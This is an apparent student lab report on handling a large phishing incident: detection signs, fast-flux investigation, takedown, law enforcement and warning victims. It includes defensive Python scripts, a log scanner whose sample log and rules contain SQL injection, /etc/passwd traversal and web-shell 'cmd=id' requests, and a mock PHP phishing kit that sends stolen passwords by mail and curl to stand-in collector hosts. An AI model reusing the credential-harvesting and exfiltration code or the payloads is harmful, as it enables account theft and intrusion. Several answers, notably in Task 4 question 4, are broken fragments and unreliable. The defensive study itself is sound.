
Lab 14. Incident Handling Techniques

Kanan Nabi

Task 1. Resolving large-scale incident

Read and study the case of a large-scale attack. For the large-scale phishing attack, answer
the questions and write your thoughts on how to take down and resolve this incident.

LARGE SCALE PHISHING ATTACK

Phishing is a cyber attack that uses disguised email as a weapon. The goal is to trick
the email recipient into believing that the message is something they want or need — a
request from their bank, for instance, or a note from someone in their company — and to
click a link or download an attachment.
What really distinguishes phishing is the form the message takes: the attackers
masquerade as a trusted entity of some kind, often a real or plausibly real person, or a
company the victim might do business with.
The attackers spoof their email address so it looks like it's coming from someone else,
set up fake websites that look like ones the victim trusts, and use foreign character sets to
disguise URLs.
Phishing emails and text messages may look like they’re from a company you know
or trust. They may look like they’re from a bank, a credit card company, a social networking
site, an online payment website or app, or an online store.
Phishing emails and text messages often tell a story to trick you into clicking on a link
or opening an attachment. They may:
● say they’ve noticed some suspicious activity or log-in attempts
● claim there’s a problem with your account or your payment information
● say you must confirm some personal information
● include a fake invoice
● want you to click on a link to make a payment
● say you’re eligible to register for a government refund
● offer a coupon for free stuff.
That said, there are a variety of techniques that fall under the umbrella of phishing.
There are a couple of different ways to break attacks down into categories. One is by the
purpose of the phishing attempt. Generally, a phishing campaign tries to get the victim to do
one of two things:
Hand over sensitive information. These messages aim to trick the user into revealing
important data — often a username and password that the attacker can use to breach a system
or account. The classic version of this scam involves sending out an email tailored to look
like a message from a major bank; by spamming out the message to millions of people, the
attackers ensure that at least some of the recipients will be customers of that bank. The victim
clicks on a link in the message and is taken to a malicious site designed to resemble the
bank's webpage, and then hopefully enters their username and password. The attacker can
now access the victim's account.
Download malware. Like a lot of spam, these types of phishing emails aim to get the
victim to infect their own computer with malware. Often the messages are "soft targeted" —
they might be sent to an HR staffer with an attachment that purports to be a job seeker's
resume, for instance.
Some tell-tale signs of a phishing email include:
● ‘Too good to be true’ offers
● Unusual sender
● Poor spelling and grammar
● Threats of account shutdown, etc., particularly conveying a sense of urgency
● Links, especially when the destination URL is different than it appears in the
email content
● Unexpected attachments

Task 2 Source of information

How could you recognize that a phishing attack is happening?

Example: A phishing URL was reported by a bank, whose customers are being targeted. The
CERT has obtained a URL or URLs pointing to phishing site(s).

Answer:

Email and Web Traffic Analysis:

A sudden increase in emails containing suspicious links or attachments may indicate a
phishing campaign. Anomalous web traffic directed to a suspicious domain or to multiple
IPs is another sign.

Phishing Characteristics:

Suspicious sender addresses mimicking legitimate ones. Messages containing poor grammar,
urgent demands, or requests for sensitive information. Links that appear legitimate but point
to different URLs upon inspection.

Malware Detection:

Attachments in phishing emails may trigger antivirus alerts.
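The indicators listed above (unusual sender, urgency, links whose visible text differs from the real destination, failed sender authentication) can be checked mechanically on each reported message. The script below is an added example written for this lab, not part of the original text; the sample e-mail, the addresses and the domains in it are constructed placeholders, and the trusted domain passed to `triage()` is an assumption of the example.

```python
"""Automated triage of one e-mail for the phishing indicators named above.

Added example, not part of the lab text. The message below is constructed;
every address and domain in it is a placeholder (.invalid TLD).
"""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample: the display name claims a bank, the sending domain does not
# belong to the bank, SPF/DMARC failed at our gateway, and the visible link text
# differs from the real href.
SAMPLE_EMAIL = """\
From: "ExampleBank Security" <alerts@examplebank-secure.invalid>
Reply-To: collect@mailbox-drop.invalid
To: customer@example.com
Subject: Urgent: suspicious log-in attempt on your account
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=examplebank-secure.invalid; dkim=none; dmarc=fail header.from=examplebank-secure.invalid
Content-Type: text/html

<p>We noticed suspicious activity. Please confirm your details within 24 hours
or your account will be suspended.</p>
<a href="http://login.examplebank-secure.invalid/verify">https://www.examplebank.com/login</a>
"""

URGENCY_WORDS = ("urgent", "suspended", "within 24 hours", "confirm your", "verify your")
AUTH_RESULT = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)
ANCHOR = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def domain_of(address):
    """Lower-cased domain part of an e-mail address ('' if there is none)."""
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def triage(raw_message, trusted_domain):
    """Return the indicator names found in raw_message, in a fixed order."""
    msg = message_from_string(raw_message)
    indicators = []
    brand = trusted_domain.split(".")[0].lower()

    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = domain_of(from_addr)
    # 1. "Unusual sender": display name names the brand, address domain is not the brand's.
    if brand in display_name.lower() and from_domain != trusted_domain.lower():
        indicators.append("display-name spoof")

    # 2. Replies are steered to a different domain than the apparent sender's.
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and domain_of(reply_addr) != from_domain:
        indicators.append("reply-to mismatch")

    # 3. Gateway authentication results: anything other than "pass" is an indicator.
    for mech, result in AUTH_RESULT.findall(msg.get("Authentication-Results", "")):
        if result.lower() != "pass":
            indicators.append(f"{mech.lower()} {result.lower()}")

    # 4. Urgency / account-shutdown language in subject or body.
    body = msg.get_payload()
    text = f"{msg.get('Subject', '')} {body}".lower()
    if any(word in text for word in URGENCY_WORDS):
        indicators.append("urgency language")

    # 5. A link whose visible text is a URL on a different host than the real target.
    for href, shown in ANCHOR.findall(body):
        shown = shown.strip()
        shown_host = urlparse(shown).hostname if shown.startswith("http") else None
        if shown_host and shown_host != urlparse(href).hostname:
            indicators.append("link text/href mismatch")
            break
    return indicators


if __name__ == "__main__":
    for name in triage(SAMPLE_EMAIL, "examplebank.com"):
        print("indicator:", name)
```

The `Authentication-Results` check only carries information if the impersonated brand publishes SPF, DKIM and DMARC records; where it does not, a gateway cannot report a failure, which is why the mitigation section later in this lab recommends deploying them.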

Task 3 Initial investigation

The next step is to find out: a) whether this is a false alert, b) where the phishing sites are
located, and c) how the attack is carried out.

The answers may overlap, so all are included in one step. Questions that can help you
find out what is going on:

Are the phishing sites still active or alive? How to check this?
Are they active in all popular browsers or just in a particular one? What about wget?
Maybe the phishing site requires a specific ‘user agent’ field set or another (for example
‘referer’)?
Where are the phishing sites (logically and physically) located? How to find out?
What is the domain and IP address of the www server? To whom does the IP and domain
name belong? Who is the host-master? Who is the ISP?
How is the attack being carried out? What technique is used to serve the phishing
site? How to check this? Is the fast-flux technique used? Does every IP returned from the DNS
query lead to a response? Are there other sites on this server (IP)? What about the main page
from the phishing URL?

Example:

The domain name resolves to many and various IPs. There is a strong possibility of
fast-flux. The IPs belong to different ISPs, perhaps in a different country. There is no ‘main
page’ on the ‘server’.
(Digression: Why are there so many IPs and why do some of them not respond?
Why do the miscreants use fast-flux? These IPs are probably zombies from some botnet.
They are probably desktop computers infected by special malware. Some of them are simply
switched off.)

Answer:

1. Check if the phishing sites are still active:

We should access the URL directly, using a secure and isolated environment (sandbox or
virtual machine) to avoid infection. Then we verify whether the site functions across
different browsers or requires a specific user agent, using commands like wget with various
user-agent headers to check accessibility.

2. Verify the logical and physical location:

We can use tools like whois to find the domain's registration details. In the next step we
can use nslookup or dig to resolve the domain to an IP address. In the last step we should
check ownership, identifying the ISP and hostmaster associated with the IP.

3. Identify attack techniques:

Check whether the domain resolves to multiple IPs, possibly indicating a fast-flux network.
In the next step we should analyse the DNS responses to see whether all returned IPs
provide a response or some are unresponsive (indicating botnet zombies). In the last step we
should analyse the web server and investigate whether the phishing URL has a primary page
or is just a collection of fraudulent forms.
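The fast-flux signs named in step 3 and in the example above (many IPs, IPs that change between queries, different ISPs, some IPs not answering) can be scored from the raw `dig` answers plus the ownership and probe results gathered in steps 1 and 2. The following script is an added example for this lab, not part of the original text: the `dig`-style answer lines, the IP-to-owner mapping standing in for `whois` output and the probe results are all constructed sample data in documentation address ranges, and the thresholds in `assess_fast_flux()` are the example's own assumptions.

```python
"""Heuristic fast-flux assessment from repeated DNS look-ups, as in Task 3 step 3.

Added example, not part of the lab. All inputs below are constructed: the dig
answers, the owner map (what whois would give) and the HTTP probe results.
"""
import ipaddress

# Constructed: `dig +noall +answer phish.example.invalid` run twice, a minute apart
DIG_ANSWERS = [
    """\
phish.example.invalid.  180  IN  A  203.0.113.10
phish.example.invalid.  180  IN  A  198.51.100.77
phish.example.invalid.  180  IN  A  192.0.2.45
""",
    """\
phish.example.invalid.  180  IN  A  203.0.113.10
phish.example.invalid.  180  IN  A  192.0.2.201
phish.example.invalid.  180  IN  A  198.51.100.9
""",
]

# Constructed: network owner per IP, as whois would report it
IP_OWNER = {
    "203.0.113.10": "AS64500 ExampleNet-A",
    "198.51.100.77": "AS64501 ExampleNet-B",
    "192.0.2.45": "AS64502 ExampleNet-C",
    "192.0.2.201": "AS64502 ExampleNet-C",
    "198.51.100.9": "AS64503 ExampleNet-D",
}

# Constructed: whether an HTTP request from the sandbox got any reply from the IP
PROBE_RESULTS = {
    "203.0.113.10": True, "198.51.100.77": False, "192.0.2.45": True,
    "192.0.2.201": False, "198.51.100.9": True,
}


def parse_a_records(dig_output):
    """Return (ttl, [ip, ...]) from dig-style answer lines; non-A records are ignored."""
    ttl, ips = None, []
    for line in dig_output.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[2] == "IN" and parts[3] == "A":
            ttl = int(parts[1])
            ips.append(str(ipaddress.ip_address(parts[4])))  # validates the address
    return ttl, ips


def assess_fast_flux(answer_sets, ip_owner, probe_results, ttl_threshold=300):
    """Score the signs the text lists: many IPs, low TTL, different owners/ISPs,
    rotation between queries, and IPs that do not respond (thresholds are assumptions)."""
    parsed = [parse_a_records(a) for a in answer_sets]
    ip_sets = [set(ips) for _, ips in parsed]
    all_ips = set().union(*ip_sets)
    stable = set.intersection(*ip_sets)          # IPs present in every answer
    ttls = [ttl for ttl, _ in parsed if ttl is not None]
    report = {
        "distinct_ips": len(all_ips),
        "ttl": min(ttls) if ttls else None,
        "distinct_owners": len({ip_owner.get(ip, "unknown") for ip in all_ips}),
        "rotated_ips": len(all_ips - stable),
        "unresponsive_ips": sorted(ip for ip in all_ips if not probe_results.get(ip, False)),
    }
    signs = [
        report["distinct_ips"] >= 3,
        report["ttl"] is not None and report["ttl"] <= ttl_threshold,
        report["distinct_owners"] >= 3,
        report["rotated_ips"] > 0,
        len(report["unresponsive_ips"]) > 0,
    ]
    report["signs"] = sum(signs)
    report["likely_fast_flux"] = report["signs"] >= 3
    return report


if __name__ == "__main__":
    for key, value in assess_fast_flux(DIG_ANSWERS, IP_OWNER, PROBE_RESULTS).items():
        print(f"{key}: {value}")
```

A legitimate site behind a content delivery network can also return several IPs with a short TTL, so the owner diversity and the unresponsive-IP count are the signs that separate a botnet of home machines from a CDN; the verdict is a prompt for the analyst, not a conclusion.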

Task 4 Take down

The next step is to organize the takedown of this site as soon as possible. It is
recommended that an attempt be made to try to track down the miscreants and victims of the
phishing. Questions for you:

1. How to take down the phishing site? What is the fastest way to communicate with
the administrator of the site? From which source can you get contact information?

Example: You could check the who.is database. The fastest way of contacting is by
telephone. Often it is better to send the details via e-mail and then call to inform them that
there was a phishing incident and that the details were sent via e-mail. Maybe there is an
abuse team or CERT team operating at the ISP? You must take language and time differences
into account. In this case it is recommended that another CERT team from that country be
involved – you could look one up on the FIRST site, www.first.org.

2. Is the deletion of the phishing site by the administrator of a compromised site
enough?
Where could you search for information about the break-in to the server and the
vulnerability? If there could be a vulnerability in the www server or in the PHP scripts or in
the database, etc., where can you find information about suspicious requests, form entries,
errors, etc.? (Answer: inadequate server logs, etc.)

Server logs: You should mainly look at the following log files:

● Web server logs (Apache: access.log, error.log; Nginx: access.log, error.log)
● PHP error logs
● Database logs (MySQL, PostgreSQL, etc.)
● Firewall and IDS/IPS logs (Snort, Suricata, etc.)
● Syslog or Event Viewer data (for Linux and Windows)

Where can suspicious requests, form entries, and errors be found?

● Web server logs: To check for unusual HTTP requests.
● Database query logs: To detect SQL injection attempts.
● PHP and script error logs: To find out which part of the site is weak.
● WAF (Web Application Firewall) logs: To detect attack attempts.

Finally, the root causes of the site being hacked should be investigated, loopholes should
be closed, and appropriate security measures should be taken.
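Reading a web server's access.log for "unusual HTTP requests" is the first of the checks above, and it also answers the question of whether deleting the phishing directory was enough: the log shows how the kit got there. The script below is an added example for this lab, not part of the original text. The Apache combined-format lines are constructed (documentation IPs, placeholder paths), the signature rules are a responder's starting set rather than a complete WAF rule base, and the rule that flags scripts or pages under the site's static directories assumes, for the example, that the site normally keeps only images and stylesheets there.

```python
"""Scan a web-server access log for the suspicious requests the text refers to.

Added example, not part of the lab. The log lines are constructed; the rules are
simple signatures a responder would start with, not a WAF.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [12/Mar/2025:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2025:10:05:44 +0000] "GET /index.php?id=1%27%20OR%201%3D1-- HTTP/1.1" 500 312 "-" "sqlmap/1.7"
198.51.100.23 - - [12/Mar/2025:10:06:10 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1844 "-" "sqlmap/1.7"
198.51.100.23 - - [12/Mar/2025:10:09:31 +0000] "POST /uploads/avatar.php HTTP/1.1" 200 24 "-" "python-requests/2.31"
198.51.100.23 - - [12/Mar/2025:10:09:40 +0000] "GET /uploads/avatar.php?cmd=id HTTP/1.1" 200 61 "-" "python-requests/2.31"
203.0.113.77 - - [12/Mar/2025:11:20:03 +0000] "GET /images/secure-login/index.html HTTP/1.1" 200 9031 "http://mail.example.invalid/" "Mozilla/5.0"
203.0.113.78 - - [12/Mar/2025:11:20:45 +0000] "POST /images/secure-login/login.php HTTP/1.1" 302 0 "http://www.example.invalid/images/secure-login/index.html" "Mozilla/5.0"
"""

# Apache/Nginx "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# (tag, field, pattern): applied to the URL-decoded path or to the user agent
RULES = [
    ("sql injection", "path", re.compile(r"'\s*(or|and|union)\b|union\s+select|'--", re.I)),
    ("path traversal", "path", re.compile(r"\.\./|/etc/passwd", re.I)),
    ("script in upload dir", "path", re.compile(r"^/uploads/[^?]*\.php", re.I)),
    ("command parameter", "path", re.compile(r"[?&]cmd=", re.I)),
    # Assumption for the example: these directories should hold only static files
    ("page under static dir", "path", re.compile(r"^/(images|img|css|js|static)/.*\.(php|html?)(\?|$)", re.I)),
    ("tool user agent", "agent", re.compile(r"sqlmap|nikto|python-requests|curl/", re.I)),
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def scan(log_text):
    """Return the records that trip at least one rule, each with its list of tags."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        decoded = unquote(rec["path"])  # rules run on the decoded path, not the raw one
        tags = [tag for tag, field, pat in RULES
                if pat.search(decoded if field == "path" else rec["agent"])]
        if tags:
            rec["tags"] = tags
            findings.append(rec)
    return findings


def per_source(findings):
    """Group findings by client IP: first/last timestamp and a count per tag."""
    out = defaultdict(lambda: {"first": None, "last": None, "tags": Counter()})
    for rec in findings:
        entry = out[rec["ip"]]
        entry["first"] = entry["first"] or rec["time"]
        entry["last"] = rec["time"]
        entry["tags"].update(rec["tags"])
    return dict(out)


if __name__ == "__main__":
    for ip, info in per_source(scan(SAMPLE_ACCESS_LOG)).items():
        print(ip, info["first"], "->", info["last"], dict(info["tags"]))
```

In the constructed log the grouping by source shows one address moving from injection attempts to a script written under the upload directory within minutes, while later unrelated visitors arrive at a page under `/images/`: the first is the break-in to fix, the second is the phishing kit to remove, and closing only the second leaves the first open.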

3. How to track down the miscreants? Where can you find some information about
them? Where are the drop sites of the miscreants? (Answer: you must analyse the source code
of the phishing site, as there may be information about where stolen data is sent. Other scripts
on the compromised server, as well as server and e-mail logs could be helpful.)
4. Where to find information about victims?
5. What to do with this information?
6. Are these steps enough? What about cases when we are unable to take the site
down?
7. Should law enforcement become involved?

Answers:
3. a) Firstly, we should analyse the source code of the phishing site. By examining the
site's HTML, JavaScript, and PHP code, it is possible to determine where the stolen data is
being sent, for example from the form action="..." attribute in the HTML.

b) We can also analyse the other scripts on the compromised server. By checking the other
PHP or CGI scripts installed on the server, it is possible to determine whether the attackers
have left a backdoor and crontheir work and

c) Another way is to check server and email logs: for example, web server logs (access.log,
error.log), database logs – to investigate malicious SQL queries or unauthorized data
extraction – and email logs – stolen information.

d) The next way is analysing DNS and IP information: a reverse DNS lookup to find out
what other domains are on the same IP, and passive DNS databases.
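Point a) above, finding where the stolen data is sent, comes down to pulling the form action, the addresses and the URLs out of the kit's files. The script below is an added example for this lab, not part of the original text. The two files in `KIT_FILES` are a constructed, deliberately minimal imitation of a credential-harvesting kit; every address, file path and domain in them is a placeholder, and the file-name conventions the function relies on (`.html` for the page, `.php`/`.js` for the handler) are the example's assumption.

```python
"""Pull exfiltration destinations out of phishing-kit source, as asked in question 3.

Added example, not part of the lab. The two files below are a constructed,
minimal imitation of a kit; every address, path and domain is a placeholder.
"""
import re

KIT_FILES = {
    "index.html": """\
<form method="post" action="login.php">
  <input name="username"> <input name="password" type="password"> <input type="submit" value="Log in">
</form>
""",
    "login.php": """\
<?php
$data = "User: " . $_POST['username'] . " Pass: " . $_POST['password'];
mail("drop.mailbox@example.invalid", "New log", $data);
file_put_contents("results/rezult.txt", $data . "\\n", FILE_APPEND);
$ch = curl_init("https://collector.example.invalid/api/ingest");
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
header("Location: https://www.examplebank.com/login");
?>
""",
}

FORM_ACTION = re.compile(r'<form\b[^>]*\baction="([^"]*)"', re.I)
INPUT_NAME = re.compile(r'<input\b[^>]*\bname="([^"]+)"', re.I)
EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
URL = re.compile(r"https?://[^\s\"']+")
LOCAL_WRITE = re.compile(r'file_put_contents\(\s*"([^"]+)"', re.I)
REDIRECT = re.compile(r'header\(\s*"Location:\s*([^"]+)"', re.I)


def find_destinations(kit_files):
    """Return where the kit sends or stores what victims type, plus the fields it collects."""
    html = "\n".join(src for name, src in kit_files.items() if name.endswith(".html"))
    code = "\n".join(src for name, src in kit_files.items() if name.endswith((".php", ".js")))
    m = REDIRECT.search(code)
    redirect = m.group(1) if m else None
    urls = sorted(set(URL.findall(code)))
    return {
        "collected_fields": INPUT_NAME.findall(html),   # what the victim is asked to type
        "form_actions": FORM_ACTION.findall(html),      # which script receives it
        "emails": sorted(set(EMAIL.findall(code))),     # mailbox drop(s)
        "local_files": LOCAL_WRITE.findall(code),       # on-server drop file(s)
        # the page the victim is bounced to is not a drop site, so keep it apart
        "exfil_urls": [u for u in urls if u != redirect],
        "redirect": redirect,
    }


if __name__ == "__main__":
    for key, value in find_destinations(KIT_FILES).items():
        print(f"{key}: {value}")
```

Each destination found this way is a separate takedown and evidence item: the mailbox goes to the mail provider's abuse contact, the on-server drop file is evidence of how many victims were caught (it must be preserved before the directory is deleted), and the external collector URL is a second host to trace with the same whois and DNS steps used for the phishing site itself.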

4. a) Phishing Site Logs

Web server logs (access.log, error.log) – Phishing
Database logs – A
Email logs – O

b) Phishing Site Source Code Analysis

Form inputs (<form action="...">)
It is possible to examine how victims' data is collected and transmitted within JavaScript and
PHP scripts.

c) Investigating Attacker Drop Sites

DNS records and WHOIS information – In a phishing attack
Reverse DNS Lookup – Another hot spot for attackers
Passive DNS analyses – Previously

d) Warning to Victims

Banks or organizations –
CERT/CSIRT teams – Damage
Reporting to platforms like Google Safe Browsing and PhishTank
5.

a) Notify Relevant Authorities

We should inform the affected organization (e.g., a bank if its customers were targeted) and
then report to cybersecurity teams like CERT (Computer Emergency Response Team).
If the attack is severe, contact law enforcement.

b) Take Down the Phishing Site

It is better to contact the hosting provider or domain registrar and then report the phishing
URL to services like Google Safe Browsing, PhishTank, and Microsoft PhishingFilter.

c) Analyse the Attack

Investigate the phishing site’s code to find information about the attackers and data
exfiltration methods. In conclusion check if any vulnerabilities were exploited (e.g., in the
website’s PHP scripts or database).

d) Warn and Mitigate

Notify potential victims via email alerts or website warnings, work with browsers to blacklist
malicious URLs and implement email security measures (SPF, DKIM, DMARC) to prevent
future attacks.

e) Strengthen Defences

Monitor network traffic for signs of ongoing phishing attacks, educate users on identifying
phishing attempts and ensure robust endpoint security and regular software updates.

6.

While the outlined steps are effective in many cases, there are scenarios where a phishing site
cannot be taken down immediately or at all. Here’s what to do in such cases:

a) Increase Awareness and Mitigation

● Warn Potential Victims: Send out alerts to users who may have interacted with the
phishing site.
● Blacklist the URL: Notify browsers (Google Safe Browsing, Microsoft Defender,
etc.) and email providers to block access.
● Work with Financial Institutions: If credentials are stolen, banks and services
should notify users and enforce account security measures.

b) Engage Cybersecurity Communities

● Report to Global Threat Intelligence Platforms: Share indicators of compromise
(IOCs) with cybersecurity teams (e.g., CERT, IT security forums).

c) Use Honeypots

● If possible, deploy deception techniques to study attacker behavior and gather further
intelligence.

d) Escalate to Law Enforcement

● Engage Legal Authorities: If the phishing attack is severe, national cybersecurity
agencies or law enforcement (Interpol, FBI’s IC3, Europol) should be involved.
● Trace Financial Transactions: If financial fraud is involved, collaboration with
financial fraud investigators can help track and freeze attacker assets.

Conclusion

If a phishing site cannot be immediately taken down, mitigation strategies, public warnings,
and intelligence sharing are essential to reduce the attack's effectiveness.

7.

Yes, law enforcement should be involved in cases where:

a) The Attack is Large-Scale or Targets Critical Infrastructure

● If the phishing campaign affects a government agency, a financial institution, or a
major corporation.
● If the attack has the potential to cause severe financial or reputational damage.

b) Personally Identifiable Information (PII) or Financial Data is Stolen

● If user credentials, banking details, or sensitive corporate data are compromised, law
enforcement can help track and mitigate damages.

c) The Attack is Part of a Larger Cybercrime Operation

● Some phishing campaigns are linked to organized cybercrime groups or state-sponsored
actors.
● Law enforcement agencies (e.g., FBI, Europol, Interpol) have the resources to
investigate beyond the immediate phishing site.

d) Legal Action is Required Against Attackers

● If the attackers are identified, authorities can initiate criminal investigations and legal
proceedings.
● Tracking financial transactions associated with phishing scams often requires law
enforcement cooperation.

How to Involve Law Enforcement?

● Report the phishing attack to national cybersecurity agencies (CERT, CISA, NCSC).
● File a complaint with cybercrime units (FBI’s IC3, Europol's EC3, Interpol).
● Provide all collected evidence, including phishing URLs, email headers, and affected
IP addresses.

Task 5 Warning & Mitigation

It is strongly recommended that potential victims be warned.

Does the bank know about the phishing?
Should you write an alert on your webpage? Who should first know about this: the
bank or the people reading your site?
How to alert people who have visited phishing site(s)? Most popular browsers can
warn people – how do you get them to do this? In which external services can you report
phishing URL(s)? (Answer: phishing sites should be reported to Google Safe Browsing,
Netcraft (https://sitereport.netcraft.com), PhishTank (https://www.phishtank.com), Microsoft
PhishingFilter
(https://support.microsoft.com/en-us/office/protect-against-phishing-attempts-in-microsoft-365-86c425e1-1686-430a-9151-f7176cce4f2c).)
Where else?

Answers:

The bank should be immediately notified if it is the primary target of the phishing attack.
They can take swift action, such as:

● Informing their customers about the fraudulent website.
● Blocking transactions from compromised accounts.
● Enhancing their fraud detection systems.

Should You Write an Alert on Your Webpage?

Yes, but the priority should be informing the bank first. Once they are aware and have issued
an official response, a general alert can be posted to warn a broader audience.

Who Should Know First: The Bank or the Public?

● First, notify the bank so they can take necessary steps to protect customers.
● Then, alert the public via website warnings, social media, and cybersecurity
awareness platforms.

How to Alert People Who Have Visited the Phishing Site?

● Report the phishing site to major security providers, so browsers warn users
before they access it.
● Use email alerts or SMS notifications (if available) to inform potentially affected
users.
● Provide security tips (e.g., changing passwords, monitoring account activity).

How to Get Browsers to Warn Users?

Most modern browsers (Chrome, Firefox, Edge, Safari) use databases like Google Safe
Browsing to block malicious sites. To report a phishing site:

● Google Safe Browsing: https://safebrowsing.google.com
● Netcraft Anti-Phishing: https://sitereport.netcraft.com
● PhishTank: https://www.phishtank.com
● Microsoft Phishing Filter:
https://support.microsoft.com/en-us/office/protect-against-phishing-attempts-in-microsoft-365-86c425e1-1686-430a-9151-f7176cce4f2c
